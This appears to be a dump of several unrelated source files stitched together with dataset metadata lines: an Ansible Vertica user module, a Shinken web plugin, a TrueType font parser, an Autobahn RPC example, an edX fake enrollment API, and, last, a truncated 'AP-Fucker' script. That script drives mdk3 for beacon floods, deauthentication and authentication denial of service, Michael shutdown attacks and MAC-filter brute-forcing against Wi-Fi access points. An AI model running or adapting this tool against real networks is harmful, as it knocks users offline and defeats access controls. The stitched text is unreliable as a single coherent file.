return self.delete_result
def run_put(self, resource_name, id, data):
return self.put_result
| bsd-3-clause | 1,116,288,068,484,164,100 | 36.72093 | 109 | 0.718249 | false |
maxamillion/ansible-modules-extras | database/vertica/vertica_user.py | 15 | 14712 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
---
module: vertica_user
version_added: '2.0'
short_description: Adds or removes Vertica database users and assigns roles.
description:
- Adds or removes Vertica database user and, optionally, assigns roles.
- A user will not be removed until all the dependencies have been dropped.
- In such a situation, if the module tries to remove the user it
will fail and only remove roles granted to the user.
options:
name:
description:
- Name of the user to add or remove.
required: true
profile:
description:
- Sets the user's profile.
required: false
default: null
resource_pool:
description:
- Sets the user's resource pool.
required: false
default: null
password:
description:
- The user's password encrypted by the MD5 algorithm.
- The password must be generated with the format C("md5" + md5[password + username]),
resulting in a total of 35 characters. An easy way to do this is by querying
the Vertica database with select 'md5'||md5('<user_password><user_name>').
required: false
default: null
expired:
description:
- Sets the user's password expiration.
required: false
default: null
ldap:
description:
- Set to true if users are authenticated via LDAP.
- The user will be created with password expired and set to I($ldap$).
required: false
default: null
roles:
description:
- Comma separated list of roles to assign to the user.
aliases: ['role']
required: false
default: null
state:
description:
- Whether to create C(present), drop C(absent) or lock C(locked) a user.
required: false
choices: ['present', 'absent', 'locked']
default: present
db:
description:
- Name of the Vertica database.
required: false
default: null
cluster:
description:
- Name of the Vertica cluster.
required: false
default: localhost
port:
description:
- Vertica cluster port to connect to.
required: false
default: 5433
login_user:
description:
- The username used to authenticate with.
required: false
default: dbadmin
login_password:
description:
- The password used to authenticate with.
required: false
default: null
notes:
- The default authentication assumes that you are either logging in as or sudo'ing
to the C(dbadmin) account on the host.
- This module uses C(pyodbc), a Python ODBC database adapter. You must ensure
that C(unixODBC) and C(pyodbc) is installed on the host and properly configured.
- Configuring C(unixODBC) for Vertica requires C(Driver = /opt/vertica/lib64/libverticaodbc.so)
to be added to the C(Vertica) section of either C(/etc/odbcinst.ini) or C($HOME/.odbcinst.ini)
and both C(ErrorMessagesPath = /opt/vertica/lib64) and C(DriverManagerEncoding = UTF-16)
to be added to the C(Driver) section of either C(/etc/vertica.ini) or C($HOME/.vertica.ini).
requirements: [ 'unixODBC', 'pyodbc' ]
author: "Dariusz Owczarek (@dareko)"
"""
EXAMPLES = """
- name: creating a new vertica user with password
vertica_user: name=user_name password=md5<encrypted_password> db=db_name state=present
- name: creating a new vertica user authenticated via ldap with roles assigned
vertica_user:
name=user_name
ldap=true
db=db_name
roles=schema_name_ro
state=present
"""
try:
import pyodbc
except ImportError:
pyodbc_found = False
else:
pyodbc_found = True
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
class NotSupportedError(Exception):
pass
class CannotDropError(Exception):
pass
# module specific functions
def get_user_facts(cursor, user=''):
facts = {}
cursor.execute("""
select u.user_name, u.is_locked, u.lock_time,
p.password, p.acctexpired as is_expired,
u.profile_name, u.resource_pool,
u.all_roles, u.default_roles
from users u join password_auditor p on p.user_id = u.user_id
where not u.is_super_user
and (? = '' or u.user_name ilike ?)
""", user, user)
while True:
rows = cursor.fetchmany(100)
if not rows:
break
for row in rows:
user_key = row.user_name.lower()
facts[user_key] = {
'name': row.user_name,
'locked': str(row.is_locked),
'password': row.password,
'expired': str(row.is_expired),
'profile': row.profile_name,
'resource_pool': row.resource_pool,
'roles': [],
'default_roles': []}
if row.is_locked:
facts[user_key]['locked_time'] = str(row.lock_time)
if row.all_roles:
facts[user_key]['roles'] = row.all_roles.replace(' ', '').split(',')
if row.default_roles:
facts[user_key]['default_roles'] = row.default_roles.replace(' ', '').split(',')
return facts
def update_roles(user_facts, cursor, user,
existing_all, existing_default, required):
del_roles = list(set(existing_all) - set(required))
if del_roles:
cursor.execute("revoke {0} from {1}".format(','.join(del_roles), user))
new_roles = list(set(required) - set(existing_all))
if new_roles:
cursor.execute("grant {0} to {1}".format(','.join(new_roles), user))
if required:
cursor.execute("alter user {0} default role {1}".format(user, ','.join(required)))
def check(user_facts, user, profile, resource_pool,
locked, password, expired, ldap, roles):
user_key = user.lower()
if user_key not in user_facts:
return False
if profile and profile != user_facts[user_key]['profile']:
return False
if resource_pool and resource_pool != user_facts[user_key]['resource_pool']:
return False
if locked != (user_facts[user_key]['locked'] == 'True'):
return False
if password and password != user_facts[user_key]['password']:
return False
if expired is not None and expired != (user_facts[user_key]['expired'] == 'True') or \
ldap is not None and ldap != (user_facts[user_key]['expired'] == 'True'):
return False
if roles and (cmp(sorted(roles), sorted(user_facts[user_key]['roles'])) != 0 or \
cmp(sorted(roles), sorted(user_facts[user_key]['default_roles'])) != 0):
return False
return True
def present(user_facts, cursor, user, profile, resource_pool,
locked, password, expired, ldap, roles):
user_key = user.lower()
if user_key not in user_facts:
query_fragments = ["create user {0}".format(user)]
if locked:
query_fragments.append("account lock")
if password or ldap:
if password:
query_fragments.append("identified by '{0}'".format(password))
else:
query_fragments.append("identified by '$ldap$'")
if expired or ldap:
query_fragments.append("password expire")
if profile:
query_fragments.append("profile {0}".format(profile))
if resource_pool:
query_fragments.append("resource pool {0}".format(resource_pool))
cursor.execute(' '.join(query_fragments))
if resource_pool and resource_pool != 'general':
cursor.execute("grant usage on resource pool {0} to {1}".format(
resource_pool, user))
update_roles(user_facts, cursor, user, [], [], roles)
user_facts.update(get_user_facts(cursor, user))
return True
else:
changed = False
query_fragments = ["alter user {0}".format(user)]
if locked is not None and locked != (user_facts[user_key]['locked'] == 'True'):
if locked:
state = 'lock'
else:
state = 'unlock'
query_fragments.append("account {0}".format(state))
changed = True
if password and password != user_facts[user_key]['password']:
query_fragments.append("identified by '{0}'".format(password))
changed = True
if ldap:
if ldap != (user_facts[user_key]['expired'] == 'True'):
query_fragments.append("password expire")
changed = True
elif expired is not None and expired != (user_facts[user_key]['expired'] == 'True'):
if expired:
query_fragments.append("password expire")
changed = True
else:
raise NotSupportedError("Unexpiring user password is not supported.")
if profile and profile != user_facts[user_key]['profile']:
query_fragments.append("profile {0}".format(profile))
changed = True
if resource_pool and resource_pool != user_facts[user_key]['resource_pool']:
query_fragments.append("resource pool {0}".format(resource_pool))
if user_facts[user_key]['resource_pool'] != 'general':
cursor.execute("revoke usage on resource pool {0} from {1}".format(
user_facts[user_key]['resource_pool'], user))
if resource_pool != 'general':
cursor.execute("grant usage on resource pool {0} to {1}".format(
resource_pool, user))
changed = True
if changed:
cursor.execute(' '.join(query_fragments))
if roles and (cmp(sorted(roles), sorted(user_facts[user_key]['roles'])) != 0 or \
cmp(sorted(roles), sorted(user_facts[user_key]['default_roles'])) != 0):
update_roles(user_facts, cursor, user,
user_facts[user_key]['roles'], user_facts[user_key]['default_roles'], roles)
changed = True
if changed:
user_facts.update(get_user_facts(cursor, user))
return changed
def absent(user_facts, cursor, user, roles):
user_key = user.lower()
if user_key in user_facts:
update_roles(user_facts, cursor, user,
user_facts[user_key]['roles'], user_facts[user_key]['default_roles'], [])
try:
cursor.execute("drop user {0}".format(user_facts[user_key]['name']))
except pyodbc.Error:
raise CannotDropError("Dropping user failed due to dependencies.")
del user_facts[user_key]
return True
else:
return False
# module logic
def main():
module = AnsibleModule(
argument_spec=dict(
user=dict(required=True, aliases=['name']),
profile=dict(default=None),
resource_pool=dict(default=None),
password=dict(default=None),
expired=dict(type='bool', default=None),
ldap=dict(type='bool', default=None),
roles=dict(default=None, aliases=['role']),
state=dict(default='present', choices=['absent', 'present', 'locked']),
db=dict(default=None),
cluster=dict(default='localhost'),
port=dict(default='5433'),
login_user=dict(default='dbadmin'),
login_password=dict(default=None),
), supports_check_mode = True)
if not pyodbc_found:
module.fail_json(msg="The python pyodbc module is required.")
user = module.params['user']
profile = module.params['profile']
if profile:
profile = profile.lower()
resource_pool = module.params['resource_pool']
if resource_pool:
resource_pool = resource_pool.lower()
password = module.params['password']
expired = module.params['expired']
ldap = module.params['ldap']
roles = []
if module.params['roles']:
roles = module.params['roles'].split(',')
roles = filter(None, roles)
state = module.params['state']
if state == 'locked':
locked = True
else:
locked = False
db = ''
if module.params['db']:
db = module.params['db']
changed = False
try:
dsn = (
"Driver=Vertica;"
"Server={0};"
"Port={1};"
"Database={2};"
"User={3};"
"Password={4};"
"ConnectionLoadBalance={5}"
).format(module.params['cluster'], module.params['port'], db,
module.params['login_user'], module.params['login_password'], 'true')
db_conn = pyodbc.connect(dsn, autocommit=True)
cursor = db_conn.cursor()
except Exception:
e = get_exception()
module.fail_json(msg="Unable to connect to database: {0}.".format(e))
try:
user_facts = get_user_facts(cursor)
if module.check_mode:
changed = not check(user_facts, user, profile, resource_pool,
locked, password, expired, ldap, roles)
elif state == 'absent':
try:
changed = absent(user_facts, cursor, user, roles)
except pyodbc.Error:
e = get_exception()
module.fail_json(msg=str(e))
elif state in ['present', 'locked']:
try:
changed = present(user_facts, cursor, user, profile, resource_pool,
locked, password, expired, ldap, roles)
except pyodbc.Error:
e = get_exception()
module.fail_json(msg=str(e))
except NotSupportedError:
e = get_exception()
module.fail_json(msg=str(e), ansible_facts={'vertica_users': user_facts})
except CannotDropError:
e = get_exception()
module.fail_json(msg=str(e), ansible_facts={'vertica_users': user_facts})
except SystemExit:
# avoid catching this on python 2.4
raise
except Exception:
e = get_exception()
module.fail_json(msg=e)
module.exit_json(changed=changed, user=user, ansible_facts={'vertica_users': user_facts})
if __name__ == '__main__':
main()
| gpl-3.0 | 1,226,154,136,544,494,800 | 36.057935 | 98 | 0.60488 | false |
baloo/shinken | shinken/webui/plugins/flow/flow.py | 1 | 3289 | ### Will be populated by the UI with its own value
app = None
import time
from shinken.webui.bottle import redirect
from shinken.modules.webui_broker.helper import hst_srv_sort
from shinken.util import safe_print
try:
import json
except ImportError:
# For old Python version, load
# simple json (it can be hard json?! It's 2 functions guy!)
try:
import simplejson as json
except ImportError:
print "Error : you need the json or simplejson module"
raise
# Get the div for each element
def get_div(elt):
icon = app.helper.get_icon_state(elt)
stars = ''
for i in range(2, elt.business_impact):
stars += '''<div class="criticity-inpb-icon-%d">
<img src="/static/images/star.png">
</div>''' % (i-1)
lnk = app.helper.get_link_dest(elt)
button = app.helper.get_button('', img='/static/images/search.png')
button_recheck = '''<a href="#" onclick="recheck_now('%s')">%s</a>''' % (elt.get_full_name(), app.helper.get_button('Recheck', img='/static/images/delay.gif'))
button_ack = '''<a href="#" onclick="acknowledge('%s')">%s</a>''' % (elt.get_full_name(), app.helper.get_button('Ack', img='/static/images/wrench.png'))
pulse = ''
if elt.is_problem or (elt.state_id != 0 and elt.business_impact > 2):
pulse = '<span class="wall-pulse pulse" title=""></span>'
s = """
%s
%s
<div class="item-icon">
<img class="wall-icon" src="%s"></img>
</div>
<div class="item-text">
<span class="state_%s">%s %s</span>
</div>
<div class="item-button">
<a href="%s">%s</a>
</div>
<div class="recheck-button">
%s
</div>
<div class="ack-button">
%s
</div>
""" % (stars, pulse, icon, elt.state.lower(), elt.state, elt.get_full_name(), lnk, button, button_recheck, button_ack)
s = s.encode('utf8', 'ignore')
return s
# Our page
def get_page():
# First we look for the user sid
# so we bail out if it's a false one
user = app.get_user_auth()
if not user:
redirect("/user/login")
all_imp_impacts = app.datamgr.get_important_elements()
all_imp_impacts.sort(hst_srv_sort)
#all_imp_impacts.sort(hst_srv_sort)
#all_imp_impacts = app.datamgr.get_services()#important_elements()
impacts = []
for imp in all_imp_impacts:
safe_print("FIND A BAD SERVICE IN IMPACTS", imp.get_dbg_name())
d = {'name' : imp.get_full_name().encode('utf8', 'ignore'),
"title": "My Image 3", "thumb": "/static/images/state_flapping.png", "zoom": "/static/images/state_flapping.png",
"html" : get_div(imp)}
impacts.append(d)
# Got in json format
#j_impacts = json.dumps(impacts)
# print "Return impact in json", j_impacts
all_pbs = app.datamgr.get_all_problems()
now = time.time()
# Get only the last 10min errors
all_pbs = [pb for pb in all_pbs if pb.last_state_change > now - 600]
# And sort it
all_pbs.sort(hst_srv_sort)#sort_by_last_state_change)
return {'app' : app, 'user' : user, 'impacts' : impacts, 'problems' : all_pbs}
pages = {get_page : { 'routes' : ['/flow/'], 'view' : 'flow', 'static' : True}}
| agpl-3.0 | 9,178,488,943,381,101,000 | 32.222222 | 163 | 0.585892 | false |
brototyp/CouchPotato | library/hachoir_parser/misc/ttf.py | 95 | 9417 | """
TrueType Font parser.
Documents:
- "An Introduction to TrueType Fonts: A look inside the TTF format"
written by "NRSI: Computers & Writing Systems"
http://scripts.sil.org/cms/scripts/page.php?site_id=nrsi&item_id=IWS-Chapter08
Author: Victor Stinner
Creation date: 2007-02-08
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet, ParserError,
UInt16, UInt32, Bit, Bits,
PaddingBits, NullBytes,
String, RawBytes, Bytes, Enum,
TimestampMac32)
from hachoir_core.endian import BIG_ENDIAN
from hachoir_core.text_handler import textHandler, hexadecimal, filesizeHandler
MAX_NAME_COUNT = 300
MIN_NB_TABLE = 3
MAX_NB_TABLE = 30
DIRECTION_NAME = {
0: u"Mixed directional",
1: u"Left to right",
2: u"Left to right + neutrals",
-1: u"Right to left",
-2: u"Right to left + neutrals",
}
NAMEID_NAME = {
0: u"Copyright notice",
1: u"Font family name",
2: u"Font subfamily name",
3: u"Unique font identifier",
4: u"Full font name",
5: u"Version string",
6: u"Postscript name",
7: u"Trademark",
8: u"Manufacturer name",
9: u"Designer",
10: u"Description",
11: u"URL Vendor",
12: u"URL Designer",
13: u"License Description",
14: u"License info URL",
16: u"Preferred Family",
17: u"Preferred Subfamily",
18: u"Compatible Full",
19: u"Sample text",
20: u"PostScript CID findfont name",
}
PLATFORM_NAME = {
0: "Unicode",
1: "Macintosh",
2: "ISO",
3: "Microsoft",
4: "Custom",
}
CHARSET_MAP = {
# (platform, encoding) => charset
0: {3: "UTF-16-BE"},
1: {0: "MacRoman"},
3: {1: "UTF-16-BE"},
}
class TableHeader(FieldSet):
def createFields(self):
yield String(self, "tag", 4)
yield textHandler(UInt32(self, "checksum"), hexadecimal)
yield UInt32(self, "offset")
yield filesizeHandler(UInt32(self, "size"))
def createDescription(self):
return "Table entry: %s (%s)" % (self["tag"].display, self["size"].display)
class NameHeader(FieldSet):
def createFields(self):
yield Enum(UInt16(self, "platformID"), PLATFORM_NAME)
yield UInt16(self, "encodingID")
yield UInt16(self, "languageID")
yield Enum(UInt16(self, "nameID"), NAMEID_NAME)
yield UInt16(self, "length")
yield UInt16(self, "offset")
def getCharset(self):
platform = self["platformID"].value
encoding = self["encodingID"].value
try:
return CHARSET_MAP[platform][encoding]
except KeyError:
self.warning("TTF: Unknown charset (%s,%s)" % (platform, encoding))
return "ISO-8859-1"
def createDescription(self):
platform = self["platformID"].display
name = self["nameID"].display
return "Name record: %s (%s)" % (name, platform)
def parseFontHeader(self):
yield UInt16(self, "maj_ver", "Major version")
yield UInt16(self, "min_ver", "Minor version")
yield UInt16(self, "font_maj_ver", "Font major version")
yield UInt16(self, "font_min_ver", "Font minor version")
yield textHandler(UInt32(self, "checksum"), hexadecimal)
yield Bytes(self, "magic", 4, r"Magic string (\x5F\x0F\x3C\xF5)")
if self["magic"].value != "\x5F\x0F\x3C\xF5":
raise ParserError("TTF: invalid magic of font header")
# Flags
yield Bit(self, "y0", "Baseline at y=0")
yield Bit(self, "x0", "Left sidebearing point at x=0")
yield Bit(self, "instr_point", "Instructions may depend on point size")
yield Bit(self, "ppem", "Force PPEM to integer values for all")
yield Bit(self, "instr_width", "Instructions may alter advance width")
yield Bit(self, "vertical", "e laid out vertically?")
yield PaddingBits(self, "reserved[]", 1)
yield Bit(self, "linguistic", "Requires layout for correct linguistic rendering?")
yield Bit(self, "gx", "Metamorphosis effects?")
yield Bit(self, "strong", "Contains strong right-to-left glyphs?")
yield Bit(self, "indic", "contains Indic-style rearrangement effects?")
yield Bit(self, "lossless", "Data is lossless (Agfa MicroType compression)")
yield Bit(self, "converted", "Font converted (produce compatible metrics)")
yield Bit(self, "cleartype", "Optimised for ClearType")
yield Bits(self, "adobe", 2, "(used by Adobe)")
yield UInt16(self, "unit_per_em", "Units per em")
if not(16 <= self["unit_per_em"].value <= 16384):
raise ParserError("TTF: Invalid unit/em value")
yield UInt32(self, "created_high")
yield TimestampMac32(self, "created")
yield UInt32(self, "modified_high")
yield TimestampMac32(self, "modified")
yield UInt16(self, "xmin")
yield UInt16(self, "ymin")
yield UInt16(self, "xmax")
yield UInt16(self, "ymax")
# Mac style
yield Bit(self, "bold")
yield Bit(self, "italic")
yield Bit(self, "underline")
yield Bit(self, "outline")
yield Bit(self, "shadow")
yield Bit(self, "condensed", "(narrow)")
yield Bit(self, "expanded")
yield PaddingBits(self, "reserved[]", 9)
yield UInt16(self, "lowest", "Smallest readable size in pixels")
yield Enum(UInt16(self, "font_dir", "Font direction hint"), DIRECTION_NAME)
yield Enum(UInt16(self, "ofst_format"), {0: "short offsets", 1: "long"})
yield UInt16(self, "glyph_format", "(=0)")
def parseNames(self):
# Read header
yield UInt16(self, "format")
if self["format"].value != 0:
raise ParserError("TTF (names): Invalid format (%u)" % self["format"].value)
yield UInt16(self, "count")
yield UInt16(self, "offset")
if MAX_NAME_COUNT < self["count"].value:
raise ParserError("Invalid number of names (%s)"
% self["count"].value)
# Read name index
entries = []
for index in xrange(self["count"].value):
entry = NameHeader(self, "header[]")
yield entry
entries.append(entry)
# Sort names by their offset
entries.sort(key=lambda field: field["offset"].value)
# Read name value
last = None
for entry in entries:
# Skip duplicates values
new = (entry["offset"].value, entry["length"].value)
if last and last == new:
self.warning("Skip duplicate %s %s" % (entry.name, new))
continue
last = (entry["offset"].value, entry["length"].value)
# Skip negative offset
offset = entry["offset"].value + self["offset"].value
if offset < self.current_size//8:
self.warning("Skip value %s (negative offset)" % entry.name)
continue
# Add padding if any
padding = self.seekByte(offset, relative=True, null=True)
if padding:
yield padding
# Read value
size = entry["length"].value
if size:
yield String(self, "value[]", size, entry.description, charset=entry.getCharset())
padding = (self.size - self.current_size) // 8
if padding:
yield NullBytes(self, "padding_end", padding)
class Table(FieldSet):
TAG_INFO = {
"head": ("header", "Font header", parseFontHeader),
"name": ("names", "Names", parseNames),
}
def __init__(self, parent, name, table, **kw):
FieldSet.__init__(self, parent, name, **kw)
self.table = table
tag = table["tag"].value
if tag in self.TAG_INFO:
self._name, self._description, self.parser = self.TAG_INFO[tag]
else:
self.parser = None
def createFields(self):
if self.parser:
for field in self.parser(self):
yield field
else:
yield RawBytes(self, "content", self.size//8)
def createDescription(self):
return "Table %s (%s)" % (self.table["tag"].value, self.table.path)
class TrueTypeFontFile(Parser):
endian = BIG_ENDIAN
PARSER_TAGS = {
"id": "ttf",
"category": "misc",
"file_ext": ("ttf",),
"min_size": 10*8, # FIXME
"description": "TrueType font",
}
def validate(self):
if self["maj_ver"].value != 1:
return "Invalid major version (%u)" % self["maj_ver"].value
if self["min_ver"].value != 0:
return "Invalid minor version (%u)" % self["min_ver"].value
if not (MIN_NB_TABLE <= self["nb_table"].value <= MAX_NB_TABLE):
return "Invalid number of table (%u)" % self["nb_table"].value
return True
def createFields(self):
yield UInt16(self, "maj_ver", "Major version")
yield UInt16(self, "min_ver", "Minor version")
yield UInt16(self, "nb_table")
yield UInt16(self, "search_range")
yield UInt16(self, "entry_selector")
yield UInt16(self, "range_shift")
tables = []
for index in xrange(self["nb_table"].value):
table = TableHeader(self, "table_hdr[]")
yield table
tables.append(table)
tables.sort(key=lambda field: field["offset"].value)
for table in tables:
padding = self.seekByte(table["offset"].value, null=True)
if padding:
yield padding
size = table["size"].value
if size:
yield Table(self, "table[]", table, size=size*8)
padding = self.seekBit(self.size, null=True)
if padding:
yield padding
| gpl-3.0 | 7,273,182,620,738,885,000 | 32.99639 | 94 | 0.605713 | false |
ahmedbodi/AutobahnPython | examples/twisted/wamp1/rpc/simple/example2/server.py | 17 | 3564 | ###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
import sys, math
from twisted.python import log
from twisted.internet import reactor, defer
from twisted.web.server import Site
from twisted.web.static import File
from autobahn.twisted.websocket import listenWS
from autobahn.wamp1.protocol import exportRpc, \
WampServerFactory, \
WampServerProtocol
class Calc:
"""
A simple calc service we will export for Remote Procedure Calls (RPC).
All you need to do is use the @exportRpc decorator on methods
you want to provide for RPC and register a class instance in the
server factory (see below).
The method will be exported under the Python method name, or
under the (optional) name you can provide as an argument to the
decorator (see asyncSum()).
"""
@exportRpc
def add(self, x, y):
return x + y
@exportRpc
def sub(self, x, y):
return x - y
@exportRpc
def square(self, x):
MAX = 1000
if x > MAX:
## raise a custom exception
raise Exception("http://example.com/error#number_too_big",
"%d too big for me, max is %d" % (x, MAX),
MAX)
return x * x
@exportRpc
def sum(self, list):
return reduce(lambda x, y: x + y, list)
@exportRpc
def pickySum(self, list):
errs = []
for i in list:
if i % 3 == 0:
errs.append(i)
if len(errs) > 0:
raise Exception("http://example.com/error#invalid_numbers",
"one or more numbers are multiples of 3",
errs)
return reduce(lambda x, y: x + y, list)
@exportRpc
def sqrt(self, x):
return math.sqrt(x)
@exportRpc("asum")
def asyncSum(self, list):
## Simulate a slow function.
d = defer.Deferred()
reactor.callLater(3, d.callback, self.sum(list))
return d
class SimpleServerProtocol(WampServerProtocol):
"""
Demonstrates creating a simple server with Autobahn WebSockets that
responds to RPC calls.
"""
def onSessionOpen(self):
# when connection is established, we create our
# service instances ...
self.calc = Calc()
# .. and register them for RPC. that's it.
self.registerForRpc(self.calc, "http://example.com/simple/calc#")
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == 'debug':
log.startLogging(sys.stdout)
debug = True
else:
debug = False
factory = WampServerFactory("ws://localhost:9000", debugWamp = debug)
factory.protocol = SimpleServerProtocol
factory.setProtocolOptions(allowHixie76 = True)
listenWS(factory)
webdir = File(".")
web = Site(webdir)
reactor.listenTCP(8080, web)
reactor.run()
| apache-2.0 | 342,293,789,144,472,200 | 27.741935 | 79 | 0.600168 | false |
sameetb-cuelogic/edx-platform-test | common/djangoapps/enrollment/tests/fake_data_api.py | 26 | 3120 | """
A Fake Data API for testing purposes.
"""
import copy
import datetime
_DEFAULT_FAKE_MODE = {
"slug": "honor",
"name": "Honor Code Certificate",
"min_price": 0,
"suggested_prices": "",
"currency": "usd",
"expiration_datetime": None,
"description": None
}
_ENROLLMENTS = []
_COURSES = []
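# Module-level in-memory stores backing the fake API; reset() empties both between tests.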
# pylint: disable=unused-argument
def get_course_enrollments(student_id):
"""Stubbed out Enrollment data request."""
return _ENROLLMENTS
def get_course_enrollment(student_id, course_id):
"""Stubbed out Enrollment data request."""
return _get_fake_enrollment(student_id, course_id)
def create_course_enrollment(student_id, course_id, mode='honor', is_active=True):
"""Stubbed out Enrollment creation request. """
return add_enrollment(student_id, course_id, mode=mode, is_active=is_active)
def update_course_enrollment(student_id, course_id, mode=None, is_active=None):
"""Stubbed out Enrollment data request."""
enrollment = _get_fake_enrollment(student_id, course_id)
if enrollment and mode is not None:
enrollment['mode'] = mode
if enrollment and is_active is not None:
enrollment['is_active'] = is_active
return enrollment
def get_course_enrollment_info(course_id):
"""Stubbed out Enrollment data request."""
return _get_fake_course_info(course_id)
def _get_fake_enrollment(student_id, course_id):
"""Get an enrollment from the enrollments array."""
for enrollment in _ENROLLMENTS:
if student_id == enrollment['student'] and course_id == enrollment['course']['course_id']:
return enrollment
def _get_fake_course_info(course_id):
"""Get a course from the courses array."""
for course in _COURSES:
if course_id == course['course_id']:
return course
def add_enrollment(student_id, course_id, is_active=True, mode='honor'):
"""Append an enrollment to the enrollments array."""
enrollment = {
"created": datetime.datetime.now(),
"mode": mode,
"is_active": is_active,
"course": _get_fake_course_info(course_id),
"student": student_id
}
_ENROLLMENTS.append(enrollment)
return enrollment
def add_course(course_id, enrollment_start=None, enrollment_end=None, invite_only=False, course_modes=None):
"""Append course to the courses array."""
course_info = {
"course_id": course_id,
"enrollment_end": enrollment_end,
"course_modes": [],
"enrollment_start": enrollment_start,
"invite_only": invite_only,
}
if not course_modes:
course_info['course_modes'].append(_DEFAULT_FAKE_MODE)
else:
for mode in course_modes:
new_mode = copy.deepcopy(_DEFAULT_FAKE_MODE)
new_mode['slug'] = mode
course_info['course_modes'].append(new_mode)
_COURSES.append(course_info)
def reset():
"""Set the enrollments and courses arrays to be empty."""
global _COURSES # pylint: disable=global-statement
_COURSES = []
global _ENROLLMENTS # pylint: disable=global-statement
_ENROLLMENTS = []
| agpl-3.0 | -4,717,372,604,753,869,000 | 28.714286 | 108 | 0.648718 | false |
PrinceShaji/StreamBox | TestCodes/examplecodes/AP-Fucker.py | 1 | 9270 |
#!/usr/bin/env python
# -*- coding: Utf-8 -*-
#
# WIRELESS ACCESS POINT FUCKER
# Interactive, Multifunction, Destruction Mode Included
#
# Thanks to BackTrack crew, especially ShamanVirtuel and ASPJ
#
# USAGE: Launch the script as root using "python AP-Fucker.py", follow instructions, enjoy!
# Prerequisites: Have mdk3 installed
#
__app__ = "AP-Fucker"
__version__ = "0.5"
__author__ = "MatToufoutu"
### IMPORTS
from sys import stdout
from sys import exit as sysexit
from os import system, remove, path
from commands import getoutput
from threading import Thread
from time import sleep, ctime
### MDK3 THREADED ATTACKS CLASS
class Mdk3(Thread):
def __init__(self, attack, attack_options):
Thread.__init__(self)
self.attack = attack
self.iface = attack_options[0]
self.essid = attack_options[1]
self.bssid = attack_options[2]
self.chan = attack_options[3]
self.log = "apfucker.log"
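# Map the single-letter menu keys to the mdk3 attack methods defined below.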
self.modes = {"B":self.bflood, "A":self.ados, "D":self.amok,
"M":self.mich, "W":self.wids, "C":self.brutmac}
def bflood(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching beacon flood against %s on channel %s -----" % (self.essid, self.chan))
out.close()
print("\n Launching beacon flood against %s on channel %s" % (self.essid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" b -n "+self.essid+" -g -w -m -c "+self.chan+" >> "+self.log)
def ados(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Auth DoS against %s -----" % (self.bssid))
out.close()
print("\n Launching Auth DoS against %s " % (self.bssid))
sleep(2)
system("mdk3 "+self.iface+" a -i "+self.bssid+" -m -s 1024 >> "+self.log)
def amok(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Deauth Flood 'Amok' Mode on channel %s -----" % (self.chan))
out.close()
print("\n Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan))
sleep(2)
system("mdk3 "+self.iface+" d -c "+self.chan+" -s 1024 >> "+self.log)
def mich(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Michael 'Shutdown' Exploitation against %s on channel %s -----" % (self.bssid, self.chan))
out.close()
print("\n Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" m -t "+self.bssid+" -j -w 1 -n 1024 -s 1024 >> "+self.log)
def wids(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching WIDS Confusion against %s on channel %s -----" % (self.essid, self.chan))
out.close()
print("\n Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" w -e "+self.essid+" -c "+self.chan+" >> "+self.log)
def brutmac(self):
global runanim
runanim = True
out = open(self.log, "a")
out.write("\n ----- "+ctime()+" : Launching MAC filter Brute-Forcer against %s -----\n" % (self.bssid))
print("\n Launching MAC filter Brute-Forcer against %s" % (self.bssid))
sleep(2)
macfound = getoutput("mdk3 "+self.iface+" f -t "+self.bssid).splitlines()[-2:]
runanim = False
sleep(1)
print; print
for line in macfound:
print(line)
out.write("\n"+line)
out.close()
print
sysexit(0)
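# Thread entry point: raise the spinner flag, run the selected attack
# (blocks until mdk3 returns), then clear the flag.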
def run(self):
global runanim
runanim = True
self.modes[self.attack]()
runanim = False
### AUXILIARY FUNCTIONS
## CHECK IF IFACE IS IN MONITOR MODE
def check_mon(iface):
for line in getoutput("iwconfig "+iface).splitlines():
if "Mode:Monitor" in line:
return True
return False
## CHECK IF BSSID IS VALID
def check_mac(ap):
if len(ap) != 17 or ap.count(':') != 5:
return False
macchar = "0123456789abcdef:"
for c in ap.lower():
if macchar.find(c) == -1:
return False
return True
## CHECK IF CHANNEL IS VALID
def check_chan(iface, chan):
if chan.isdigit():
channel = int(chan)
if not channel in range(1, int(getoutput("iwlist "+iface+" channel | grep channels | awk '{print $2}'"))+1):
return False
else:
return False
return True
## CLEAN EXIT
def clean_exit():
print;print
print("\nAction aborted by user. Exiting now")
for pid in getoutput("ps aux | grep mdk3 | grep -v grep | awk '{print $2}'").splitlines():
system("kill -9 "+pid)
print("Hope you enjoyed it ;-)")
sleep(2)
system("clear")
sysexit(0)
## DUMMY WAITING MESSAGE (ANIMATED)
def waiter(mess):
try:
stdout.write("\r | "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r / "+mess)
stdout.flush()
sleep(0.15)
